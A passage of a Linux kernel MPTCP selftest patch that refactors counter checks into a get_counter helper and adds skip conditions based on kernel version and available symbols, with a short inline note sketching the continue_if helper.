++	count=$(get_counter ${ns_tx} "MPTcpExtMPFastcloseTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$fclose_tx" ]; then
++		extra_msg="$extra_msg,tx=$count"
+ 		echo "[fail] got $count MP_FASTCLOSE[s] TX expected $fclose_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1277,10 +1375,11 @@ chk_fclose_nr()
+ 	fi
+ 
+ 	echo -n " - fclzrx"
+-	count=$(ip netns exec $ns_rx nstat -as | grep MPTcpExtMPFastcloseRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	[ "$count" != "$fclose_rx" ] && extra_msg="$extra_msg,rx=$count"
+-	if [ "$count" != "$fclose_rx" ]; then
++	count=$(get_counter ${ns_rx} "MPTcpExtMPFastcloseRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$fclose_rx" ]; then
++		extra_msg="$extra_msg,rx=$count"
+ 		echo "[fail] got $count MP_FASTCLOSE[s] RX expected $fclose_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1311,9 +1410,10 @@ chk_rst_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "rtx"
+-	count=$(ip netns exec $ns_tx nstat -as | grep MPTcpExtMPRstTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ $count -lt $rst_tx ]; then
++	count=$(get_counter ${ns_tx} "MPTcpExtMPRstTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ $count -lt $rst_tx ]; then
+ 		echo "[fail] got $count MP_RST[s] TX expected $rst_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1322,9 +1422,10 @@ chk_rst_nr()
+ 	fi
+ 
+ 	echo -n " - rstrx "
+-	count=$(ip netns exec $ns_rx nstat -as | grep MPTcpExtMPRstRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" -lt "$rst_rx" ]; then
++	count=$(get_counter ${ns_rx} "MPTcpExtMPRstRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" -lt "$rst_rx" ]; then
+ 		echo "[fail] got $count MP_RST[s] RX expected $rst_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1345,9 +1446,10 @@ chk_infi_nr()
+ 	local dump_stats
+ 
+ 	printf "%-${nr_blank}s %s" " " "itx"
+-	count=$(ip netns exec $ns2 nstat -as | grep InfiniteMapTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$infi_tx" ]; then
++	count=$(get_counter ${ns2} "MPTcpExtInfiniteMapTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$infi_tx" ]; then
+ 		echo "[fail] got $count infinite map[s] TX expected $infi_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1356,9 +1458,10 @@ chk_infi_nr()
+ 	fi
+ 
+ 	echo -n " - infirx"
+-	count=$(ip netns exec $ns1 nstat -as | grep InfiniteMapRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$infi_rx" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtInfiniteMapRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$infi_rx" ]; then
+ 		echo "[fail] got $count infinite map[s] RX expected $infi_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1390,9 +1493,10 @@ chk_join_nr()
+ 	fi
+ 
+ 	printf "%03u %-36s %s" "${TEST_COUNT}" "${title}" "syn"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinSynRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$syn_nr" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPJoinSynRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$syn_nr" ]; then
+ 		echo "[fail] got $count JOIN[s] syn expected $syn_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1402,9 +1506,10 @@ chk_join_nr()
+ 
+ 	echo -n " - synack"
+ 	with_cookie=$(ip netns exec $ns2 sysctl -n net.ipv4.tcp_syncookies)
+-	count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtMPJoinSynAckRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$syn_ack_nr" ]; then
++	count=$(get_counter ${ns2} "MPTcpExtMPJoinSynAckRx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$syn_ack_nr" ]; then
+ 		# simult connections exceeding the limit with cookie enabled could go up to
+ 		# synack validation as the conn limit can be enforced reliably only after
+ 		# the subflow creation
+@@ -1420,9 +1525,10 @@ chk_join_nr()
+ 	fi
+ 
+ 	echo -n " - ack"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinAckRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$ack_nr" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPJoinAckRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$ack_nr" ]; then
+ 		echo "[fail] got $count JOIN[s] ack expected $ack_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1454,12 +1560,12 @@ chk_stale_nr()
+ 	local recover_nr
+ 
+ 	printf "%-${nr_blank}s %-18s" " " "stale"
+-	stale_nr=$(ip netns exec $ns nstat -as | grep MPTcpExtSubflowStale | awk '{print $2}')
+-	[ -z "$stale_nr" ] && stale_nr=0
+-	recover_nr=$(ip netns exec $ns nstat -as | grep MPTcpExtSubflowRecover | awk '{print $2}')
+-	[ -z "$recover_nr" ] && recover_nr=0
+ 
+-	if [ $stale_nr -lt $stale_min ] ||
++	stale_nr=$(get_counter ${ns} "MPTcpExtSubflowStale")
++	recover_nr=$(get_counter ${ns} "MPTcpExtSubflowRecover")
++	if [ -z "$stale_nr" ] || [ -z "$recover_nr" ]; then
++		echo "[skip]"
++	elif [ $stale_nr -lt $stale_min ] ||
+ 	   { [ $stale_max -gt 0 ] && [ $stale_nr -gt $stale_max ]; } ||
+ 	   [ $((stale_nr - recover_nr)) -ne $stale_delta ]; then
+ 		echo "[fail] got $stale_nr stale[s] $recover_nr recover[s], " \
+@@ -1495,12 +1601,12 @@ chk_add_nr()
+ 	timeout=$(ip netns exec $ns1 sysctl -n net.mptcp.add_addr_timeout)
+ 
+ 	printf "%-${nr_blank}s %s" " " "add"
+-	count=$(ip netns exec $ns2 nstat -as MPTcpExtAddAddr | grep MPTcpExtAddAddr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-
++	count=$(get_counter ${ns2} "MPTcpExtAddAddr")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
+	# if the test configured a short timeout tolerate greater than expected
+ 	# add addrs options, due to retransmissions
+-	if [ "$count" != "$add_nr" ] && { [ "$timeout" -gt 1 ] || [ "$count" -lt "$add_nr" ]; }; then
++	elif [ "$count" != "$add_nr" ] && { [ "$timeout" -gt 1 ] || [ "$count" -lt "$add_nr" ]; }; then
+ 		echo "[fail] got $count ADD_ADDR[s] expected $add_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1509,9 +1615,10 @@ chk_add_nr()
+ 	fi
+ 
+ 	echo -n " - echo  "
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtEchoAdd | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$echo_nr" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtEchoAdd")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$echo_nr" ]; then
+ 		echo "[fail] got $count ADD_ADDR echo[s] expected $echo_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1521,9 +1628,10 @@ chk_add_nr()
+ 
+ 	if [ $port_nr -gt 0 ]; then
+ 		echo -n " - pt "
+-		count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtPortAdd | awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$port_nr" ]; then
++		count=$(get_counter ${ns2} "MPTcpExtPortAdd")
++		if [ -z "$count" ]; then
++			echo "[skip]"
++		elif [ "$count" != "$port_nr" ]; then
+ 			echo "[fail] got $count ADD_ADDR[s] with a port-number expected $port_nr"
+ 			fail_test
+ 			dump_stats=1
+@@ -1532,10 +1640,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		printf "%-${nr_blank}s %s" " " "syn"
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinPortSynRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$syn_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMPJoinPortSynRx")
++		if [ -z "$count" ]; then
++			echo -n "[skip]"
++		elif [ "$count" != "$syn_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] syn with a different \
+ 				port-number expected $syn_nr"
+ 			fail_test
+@@ -1545,10 +1653,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		echo -n " - synack"
+-		count=$(ip netns exec $ns2 nstat -as | grep MPTcpExtMPJoinPortSynAckRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$syn_ack_nr" ]; then
++		count=$(get_counter ${ns2} "MPTcpExtMPJoinPortSynAckRx")
++		if [ -z "$count" ]; then
++			echo -n "[skip]"
++		elif [ "$count" != "$syn_ack_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] synack with a different \
+ 				port-number expected $syn_ack_nr"
+ 			fail_test
+@@ -1558,10 +1666,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		echo -n " - ack"
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPJoinPortAckRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$ack_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMPJoinPortAckRx")
++		if [ -z "$count" ]; then
++			echo "[skip]"
++		elif [ "$count" != "$ack_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] ack with a different \
+ 				port-number expected $ack_nr"
+ 			fail_test
+@@ -1571,10 +1679,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		printf "%-${nr_blank}s %s" " " "syn"
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMismatchPortSynRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$mis_syn_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMismatchPortSynRx")
++		if [ -z "$count" ]; then
++			echo -n "[skip]"
++		elif [ "$count" != "$mis_syn_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] syn with a mismatched \
+ 				port-number expected $mis_syn_nr"
+ 			fail_test
+@@ -1584,10 +1692,10 @@ chk_add_nr()
+ 		fi
+ 
+ 		echo -n " - ack   "
+-		count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMismatchPortAckRx |
+-			awk '{print $2}')
+-		[ -z "$count" ] && count=0
+-		if [ "$count" != "$mis_ack_nr" ]; then
++		count=$(get_counter ${ns1} "MPTcpExtMismatchPortAckRx")
++		if [ -z "$count" ]; then
++			echo "[skip]"
++		elif [ "$count" != "$mis_ack_nr" ]; then
+ 			echo "[fail] got $count JOIN[s] ack with a mismatched \
+ 				port-number expected $mis_ack_nr"
+ 			fail_test
+@@ -1631,9 +1739,10 @@ chk_rm_nr()
+ 	fi
+ 
+ 	printf "%-${nr_blank}s %s" " " "rm "
+-	count=$(ip netns exec $addr_ns nstat -as | grep MPTcpExtRmAddr | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$rm_addr_nr" ]; then
++	count=$(get_counter ${addr_ns} "MPTcpExtRmAddr")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$rm_addr_nr" ]; then
+ 		echo "[fail] got $count RM_ADDR[s] expected $rm_addr_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1642,29 +1751,27 @@ chk_rm_nr()
+ 	fi
+ 
+ 	echo -n " - rmsf  "
+-	count=$(ip netns exec $subflow_ns nstat -as | grep MPTcpExtRmSubflow | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ -n "$simult" ]; then
++	count=$(get_counter ${subflow_ns} "MPTcpExtRmSubflow")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ -n "$simult" ]; then
+ 		local cnt suffix
+ 
+-		cnt=$(ip netns exec $addr_ns nstat -as | grep MPTcpExtRmSubflow | awk '{print $2}')
++		cnt=$(get_counter ${addr_ns} "MPTcpExtRmSubflow")
+ 
+ 		# in case of simult flush, the subflow removal count on each side is
+ 		# unreliable
+-		[ -z "$cnt" ] && cnt=0
+ 		count=$((count + cnt))
+ 		[ "$count" != "$rm_subflow_nr" ] && suffix="$count in [$rm_subflow_nr:$((rm_subflow_nr*2))]"
+ 		if [ $count -ge "$rm_subflow_nr" ] && \
+ 		   [ "$count" -le "$((rm_subflow_nr *2 ))" ]; then
+-			echo "[ ok ] $suffix"
++			echo -n "[ ok ] $suffix"
+ 		else
+ 			echo "[fail] got $count RM_SUBFLOW[s] expected in range [$rm_subflow_nr:$((rm_subflow_nr*2))]"
+ 			fail_test
+ 			dump_stats=1
+ 		fi
+-		return
+-	fi
+-	if [ "$count" != "$rm_subflow_nr" ]; then
++	elif [ "$count" != "$rm_subflow_nr" ]; then
+ 		echo "[fail] got $count RM_SUBFLOW[s] expected $rm_subflow_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1685,9 +1792,10 @@ chk_prio_nr()
+ 	local dump_stats
+ 
+ 	printf "%-${nr_blank}s %s" " " "ptx"
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPPrioTx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$mp_prio_nr_tx" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPPrioTx")
++	if [ -z "$count" ]; then
++		echo -n "[skip]"
++	elif [ "$count" != "$mp_prio_nr_tx" ]; then
+ 		echo "[fail] got $count MP_PRIO[s] TX expected $mp_prio_nr_tx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1696,9 +1804,10 @@ chk_prio_nr()
+ 	fi
+ 
+ 	echo -n " - prx   "
+-	count=$(ip netns exec $ns1 nstat -as | grep MPTcpExtMPPrioRx | awk '{print $2}')
+-	[ -z "$count" ] && count=0
+-	if [ "$count" != "$mp_prio_nr_rx" ]; then
++	count=$(get_counter ${ns1} "MPTcpExtMPPrioRx")
++	if [ -z "$count" ]; then
++		echo "[skip]"
++	elif [ "$count" != "$mp_prio_nr_rx" ]; then
+ 		echo "[fail] got $count MP_PRIO[s] RX expected $mp_prio_nr_rx"
+ 		fail_test
+ 		dump_stats=1
+@@ -1726,7 +1835,7 @@ chk_subflow_nr()
+ 
+ 	cnt1=$(ss -N $ns1 -tOni | grep -c token)
+ 	cnt2=$(ss -N $ns2 -tOni | grep -c token)
+-	if [ "$cnt1" != "$subflow_nr" -o "$cnt2" != "$subflow_nr" ]; then
++	if [ "$cnt1" != "$subflow_nr" ] || [ "$cnt2" != "$subflow_nr" ]; then
+ 		echo "[fail] got $cnt1:$cnt2 subflows expected $subflow_nr"
+ 		fail_test
+ 		dump_stats=1
+@@ -1774,7 +1883,7 @@ wait_attempt_fail()
+ 	while [ $time -lt $timeout_ms ]; do
+ 		local cnt
+ 
+-		cnt=$(ip netns exec $ns nstat -as TcpAttemptFails | grep TcpAttemptFails | awk '{print $2}')
++		cnt=$(get_counter ${ns} "TcpAttemptFails")
+ 
+ 		[ "$cnt" = 1 ] && return 1
+ 		time=$((time + 100))
+@@ -1867,23 +1976,23 @@ subflows_error_tests()
+ 	fi
+ 
+ 	# multiple subflows, with subflow creation error
+-	if reset "multi subflows, with failing subflow"; then
++	if reset_with_tcp_filter "multi subflows, with failing subflow" ns1 10.0.3.2 REJECT &&
++	   continue_if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow
+-		filter_tcp_from $ns1 10.0.3.2 REJECT
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 1 1 1
+ 	fi
+ 
+ 	# multiple subflows, with subflow timeout on MPJ
+-	if reset "multi subflows, with subflow timeout"; then
++	if reset_with_tcp_filter "multi subflows, with subflow timeout" ns1 10.0.3.2 DROP &&
++	   continue_if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow
+-		filter_tcp_from $ns1 10.0.3.2 DROP
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 1 1 1
+ 	fi
+@@ -1891,11 +2000,11 @@ subflows_error_tests()
+ 	# multiple subflows, check that the endpoint corresponding to
+ 	# closed subflow (due to reset) is not reused if additional
+ 	# subflows are added later
+-	if reset "multi subflows, fair usage on close"; then
++	if reset_with_tcp_filter "multi subflows, fair usage on close" ns1 10.0.3.2 REJECT &&
++	   continue_if mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_set_limits $ns2 0 1
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow
+-		filter_tcp_from $ns1 10.0.3.2 REJECT
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow &
+ 
+ 		# mpj subflow will be in TW after the reset
+@@ -1995,11 +2104,18 @@ signal_address_tests()
+ 		# the peer could possibly miss some addr notification, allow retransmission
+ 		ip netns exec $ns1 sysctl -q net.mptcp.add_addr_timeout=1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+-		chk_join_nr 3 3 3
+ 
+-		# the server will not signal the address terminating
+-		# the MPC subflow
+-		chk_add_nr 3 3
++		# It is not directly linked to the commit introducing this
++		# symbol but for the parent one which is linked anyway.
++		if ! mptcp_lib_kallsyms_has "mptcp_pm_subflow_check_next$"; then
++			chk_join_nr 3 3 2
++			chk_add_nr 4 4
++		else
++			chk_join_nr 3 3 3
++			# the server will not signal the address terminating
++			# the MPC subflow
++			chk_add_nr 3 3
++		fi
+ 	fi
+ }
+ 
+@@ -2240,7 +2356,12 @@ remove_tests()
+ 		pm_nl_add_endpoint $ns2 10.0.4.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 -8 -8 slow
+ 		chk_join_nr 3 3 3
+-		chk_rm_nr 0 3 simult
++
++		if mptcp_lib_kversion_ge 5.18; then
++			chk_rm_nr 0 3 simult
++		else
++			chk_rm_nr 3 3
++		fi
+ 	fi
+ 
+ 	# addresses flush
+@@ -2479,7 +2600,8 @@ v4mapped_tests()
+ backup_tests()
+ {
+ 	# single subflow, backup
+-	if reset "single subflow, backup"; then
++	if reset "single subflow, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_set_limits $ns2 0 1
+ 		pm_nl_add_endpoint $ns2 10.0.3.2 flags subflow,backup
+@@ -2489,7 +2611,8 @@ backup_tests()
+ 	fi
+ 
+ 	# single address, backup
+-	if reset "single address, backup"; then
++	if reset "single address, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2500,7 +2623,8 @@ backup_tests()
+ 	fi
+ 
+ 	# single address with port, backup
+-	if reset "single address with port, backup"; then
++	if reset "single address with port, backup" &&
++	   continue_if mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 0 1
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal port 10100
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2510,14 +2634,16 @@ backup_tests()
+ 		chk_prio_nr 1 1
+ 	fi
+ 
+-	if reset "mpc backup"; then
++	if reset "mpc backup" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+ 		chk_join_nr 0 0 0
+ 		chk_prio_nr 0 1
+ 	fi
+ 
+-	if reset "mpc backup both sides"; then
++	if reset "mpc backup both sides" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow,backup
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow,backup
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow
+@@ -2525,14 +2651,16 @@ backup_tests()
+ 		chk_prio_nr 1 1
+ 	fi
+ 
+-	if reset "mpc switch to backup"; then
++	if reset "mpc switch to backup" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+ 		chk_join_nr 0 0 0
+ 		chk_prio_nr 0 1
+ 	fi
+ 
+-	if reset "mpc switch to backup both sides"; then
++	if reset "mpc switch to backup both sides" &&
++	   continue_if mptcp_lib_kallsyms_doesnt_have "mptcp_subflow_send_ack$"; then
+ 		pm_nl_add_endpoint $ns1 10.0.1.1 flags subflow
+ 		pm_nl_add_endpoint $ns2 10.0.1.2 flags subflow
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 0 slow backup
+@@ -2839,7 +2967,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set fullmesh flag
+-	if reset "set fullmesh flag test"; then
++	if reset "set fullmesh flag test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags subflow
+ 		pm_nl_set_limits $ns2 4 4
+@@ -2849,7 +2978,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set nofullmesh flag
+-	if reset "set nofullmesh flag test"; then
++	if reset "set nofullmesh flag test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags subflow,fullmesh
+ 		pm_nl_set_limits $ns2 4 4
+@@ -2859,7 +2989,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set backup,fullmesh flags
+-	if reset "set backup,fullmesh flags test"; then
++	if reset "set backup,fullmesh flags test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags subflow
+ 		pm_nl_set_limits $ns2 4 4
+@@ -2870,7 +3001,8 @@ fullmesh_tests()
+ 	fi
+ 
+ 	# set nobackup,nofullmesh flags
+-	if reset "set nobackup,nofullmesh flags test"; then
++	if reset "set nobackup,nofullmesh flags test" &&
++	   continue_if mptcp_lib_kversion_ge 5.18; then
+ 		pm_nl_set_limits $ns1 4 4
+ 		pm_nl_set_limits $ns2 4 4
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 flags subflow,backup,fullmesh
+@@ -2883,14 +3015,14 @@ fullmesh_tests()
+ 
+ fastclose_tests()
+ {
+-	if reset "fastclose test"; then
++	if reset_check_counter "fastclose test" "MPTcpExtMPFastcloseTx"; then
+ 		run_tests $ns1 $ns2 10.0.1.1 1024 0 fastclose_client
+ 		chk_join_nr 0 0 0
+ 		chk_fclose_nr 1 1
+ 		chk_rst_nr 1 1 invert
+ 	fi
+ 
+-	if reset "fastclose server test"; then
++	if reset_check_counter "fastclose server test" "MPTcpExtMPFastcloseRx"; then
+ 		run_tests $ns1 $ns2 10.0.1.1 1024 0 fastclose_server
+ 		chk_join_nr 0 0 0
+ 		chk_fclose_nr 1 1 invert
+@@ -2928,7 +3060,8 @@ fail_tests()
+ userspace_tests()
+ {
+ 	# userspace pm type prevents add_addr
+-	if reset "userspace pm type prevents add_addr"; then
++	if reset "userspace pm type prevents add_addr" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+@@ -2939,7 +3072,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type does not echo add_addr without daemon
+-	if reset "userspace pm no echo w/o daemon"; then
++	if reset "userspace pm no echo w/o daemon" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 0 2
+ 		pm_nl_set_limits $ns2 0 2
+@@ -2950,7 +3084,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type rejects join
+-	if reset "userspace pm type rejects join"; then
++	if reset "userspace pm type rejects join" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2960,7 +3095,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type does not send join
+-	if reset "userspace pm type does not send join"; then
++	if reset "userspace pm type does not send join" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2970,7 +3106,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type prevents mp_prio
+-	if reset "userspace pm type prevents mp_prio"; then
++	if reset "userspace pm type prevents mp_prio" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+@@ -2981,7 +3118,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm type prevents rm_addr
+-	if reset "userspace pm type prevents rm_addr"; then
++	if reset "userspace pm type prevents rm_addr" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 0 1
+@@ -2993,7 +3131,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm add & remove address
+-	if reset "userspace pm add & remove address"; then
++	if reset "userspace pm add & remove address" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns1
+ 		pm_nl_set_limits $ns2 1 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 userspace_1 0 slow
+@@ -3003,7 +3142,8 @@ userspace_tests()
+ 	fi
+ 
+ 	# userspace pm create destroy subflow
+-	if reset "userspace pm create destroy subflow"; then
++	if reset "userspace pm create destroy subflow" &&
++	   continue_if mptcp_lib_has_file '/proc/sys/net/mptcp/pm_type'; then
+ 		set_userspace_pm $ns2
+ 		pm_nl_set_limits $ns1 0 1
+ 		run_tests $ns1 $ns2 10.0.1.1 0 0 userspace_1 slow
+@@ -3014,8 +3154,10 @@ userspace_tests()
+ 
+ endpoint_tests()
+ {
++	# subflow_rebuild_header is needed to support the implicit flag
+ 	# userspace pm type prevents add_addr
+-	if reset "implicit EP"; then
++	if reset "implicit EP" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 2 2
+ 		pm_nl_set_limits $ns2 2 2
+ 		pm_nl_add_endpoint $ns1 10.0.2.1 flags signal
+@@ -3035,7 +3177,8 @@ endpoint_tests()
+ 		kill_tests_wait
+ 	fi
+ 
+-	if reset "delete and re-add"; then
++	if reset "delete and re-add" &&
++	   mptcp_lib_kallsyms_has "subflow_rebuild_header$"; then
+ 		pm_nl_set_limits $ns1 1 1
+ 		pm_nl_set_limits $ns2 1 1
+ 		pm_nl_add_endpoint $ns2 10.0.2.2 id 2 dev ns2eth2 flags subflow
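A note on continue_if: the helper gating these tests is defined earlier
in mptcp_join.sh and is not part of this excerpt. A minimal sketch of
the expected behaviour, with the reporting helper name assumed:

    # run the given predicate; on failure, report the test as skipped
    # and return non-zero so the surrounding 'if' body does not run
    continue_if()
    {
        if ! "${@}"; then
            mark_as_skipped "${@}"  # hypothetical reporting helper
            return 1
        fi
    }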
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_lib.sh b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+index 3286536b79d55..f32045b23b893 100644
+--- a/tools/testing/selftests/net/mptcp/mptcp_lib.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+@@ -38,3 +38,67 @@ mptcp_lib_check_mptcp() {
+ 		exit ${KSFT_SKIP}
+ 	fi
+ }
++
++mptcp_lib_check_kallsyms() {
++	if ! mptcp_lib_has_file "/proc/kallsyms"; then
++		echo "SKIP: CONFIG_KALLSYMS is missing"
